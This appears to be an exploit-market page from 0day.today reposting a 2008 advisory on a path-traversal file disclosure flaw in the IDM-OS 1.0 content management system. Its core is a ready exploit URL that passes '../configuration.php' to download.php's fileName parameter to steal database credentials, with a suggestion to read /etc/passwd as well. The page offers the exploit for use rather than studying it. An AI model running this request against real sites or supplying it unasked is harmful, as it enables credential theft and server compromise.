[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

IDM-OS 1.0 (download.php fileName) File Disclosure Vulnerability

Author
MhZ91
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2527
Category
web applications
Date add
21-01-2008
Platform
unsorted
================================================================
IDM-OS 1.0 (download.php fileName) File Disclosure Vulnerability
================================================================




--==+================================================================================+==--
--==+		        idmos1.0 Remote File Discolousure Vulnerability              +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: Remote File Discolusure Vulnerability
 Download:  idmos1.0
 Bug: Remote File Discolousure Vulnerability
 Info: IDMOS is a CMS (Content Management System) that fill all requirements in IDM Method. It provides dynamic front-end and administrative tools. Multilanguage, template-based, component-base, it is written in PHP and uses MySQL as DB.



[*]----------------------------------------------------------


We can download file present on the server... for example we can get the file of db credentials, configuration.php

Exploit:

http://[www.example.com]/administrator/download.php?fileName=../configuration.php


or try to get /etc/passwd :) 


[*]----------------------------------------------------------



#  0day.today [2024-11-15]  #